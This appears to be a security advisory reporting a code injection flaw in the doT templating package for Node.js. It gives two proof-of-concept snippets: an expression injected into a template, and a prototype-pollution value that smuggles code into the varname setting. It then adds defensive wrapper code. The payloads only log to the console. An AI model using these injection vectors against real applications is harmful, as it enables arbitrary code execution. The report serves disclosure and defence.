Code Injection Vulnerability in dot Package

High
N
Node.js third-party modules
Submitted None
Reported by cris_semmle

Vulnerability Details

Technical details and impact analysis

Code Injection
I would like to report a code injection vulnerability in dot. It allows attackers to execute arbitrary JS code, especially when combined with a prototype pollution attack.

# Module

**module name:** dot
**version:** 1.1.2
**npm page:** `https://www.npmjs.com/package/dot`

## Module Description

Created in search of the fastest and concise JavaScript templating function with emphasis on performance under V8 and nodejs. It shows great performance for both nodejs and browsers. doT.js is fast, small and has no dependencies.

## Module Stats

76,838 downloads in the last week

# Vulnerability

## Vulnerability Description

dot uses `Function()` to compile templates. This can be exploited by the attacker if she can control the template, or if she can control a value set on `Object.prototype`.

## Steps To Reproduce

a) The basic attack vector

```js
var doT = require("dot");

// The expression inside {{= }} is compiled into the template function body.
var tempFn = doT.template("<h1>Here is a sample template " + "{{=console.log(23)}}</h1>");
tempFn({});
```

b) In combination with a prototype pollution attack

- Create a folder `resources` and inside it a file called `mytemplate.dot` with the following content:

```html
<h1>Here is a sample template</h1>
```

- In the folder containing the `resources` folder, create and execute the following JS file:

```js
var doT = require("dot");

// prototype pollution attack vector
Object.prototype.templateSettings = {varname: "a,b,c,d,x=console.log(25)"};

// benign-looking template compilation + application
var dots = doT.process({path: "./resources"});
dots.mytemplate();
```

Even though the template compilation + application looks safe, due to the prototype pollution the attacker can execute arbitrary commands.

## Patch

N/A; remove the `Function()` call.

# Wrap up

- I contacted the maintainer to let them know: N
- I opened an issue in the related repository: N

## Impact

The attacker can achieve code injection/RCE if she can control the template or if she can set arbitrary properties on `Object.prototype`.
Using Function() with runtime computed values is rarely safe.
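The report's fix is to stop compiling through `Function()`. Short of that, an application that embeds doT can at least refuse to hand attacker-influenced settings to the compiler: honour only the caller's own properties (so an inherited `templateSettings` planted on `Object.prototype` is ignored) and require `varname` to be a plain comma-separated identifier list before it is spliced into a parameter list. The block below is an added example, not code from the report or from the doT project; the function names (`assertSafeVarname`, `pickOwnSettings`, `compileWithSafeSettings`) are hypothetical, and it assumes, as the prototype pollution PoC above implies, that whatever string ends up in `varname` is used verbatim as the generated function's parameter list. It does nothing for vector (a): when the template text itself is attacker-controlled, the only defence is to not compile it.

```javascript
// Added example, not part of the doT project or the original report.
// Defensive pre-processing of template settings for a Function()-based
// template compiler such as doT. Function names are hypothetical.

// A single formal parameter name: letters, digits, _ and $ only.
// No "=" (default initialisers), no whitespace, no punctuation.
const IDENT = /^[A-Za-z_$][A-Za-z0-9_$]*$/;

// Accepts "it" or "a, b, c"; rejects anything that would smuggle code
// into the parameter list, e.g. "a,b,c,d,x=console.log(25)".
function assertSafeVarname(varname) {
  if (typeof varname !== "string") {
    throw new TypeError("varname must be a string");
  }
  const names = varname.split(",").map((s) => s.trim());
  for (const name of names) {
    if (!IDENT.test(name)) {
      throw new Error("unsafe varname segment: " + JSON.stringify(name));
    }
  }
  return names.join(",");
}

// Defaults the wrapper is willing to apply (assumed; doT's real default
// varname is "it"). The object is frozen and used only as a key whitelist.
const DEFAULTS = Object.freeze({ varname: "it", strip: true });

// Build the settings object from own, enumerable properties only.
// An inherited `templateSettings` (prototype pollution) is never consulted,
// and unknown keys are dropped. The result has a null prototype so later
// lookups on it cannot be polluted either.
function pickOwnSettings(options) {
  const out = Object.assign(Object.create(null), DEFAULTS);
  const hasOwn = Object.prototype.hasOwnProperty;
  const src =
    options && hasOwn.call(options, "templateSettings")
      ? options.templateSettings
      : null;
  if (src && typeof src === "object") {
    for (const key of Object.keys(src)) { // own enumerable keys only
      if (hasOwn.call(DEFAULTS, key)) out[key] = src[key];
    }
  }
  out.varname = assertSafeVarname(out.varname);
  return out;
}

// Thin adapter: `compile` is any (templateText, settings) => fn compiler,
// e.g. doT.template. The template text is still trusted input here.
function compileWithSafeSettings(compile, templateText, options) {
  return compile(templateText, pickOwnSettings(options));
}

module.exports = { assertSafeVarname, pickOwnSettings, compileWithSafeSettings };
```

With this in place the pollution step from the PoC still runs, but `pickOwnSettings({ path: "./resources" })` returns `varname: "it"` because the polluted property is inherited rather than own, and an explicit `templateSettings: { varname: "x=1" }` is rejected before any `Function()` call is made.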

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Code Injection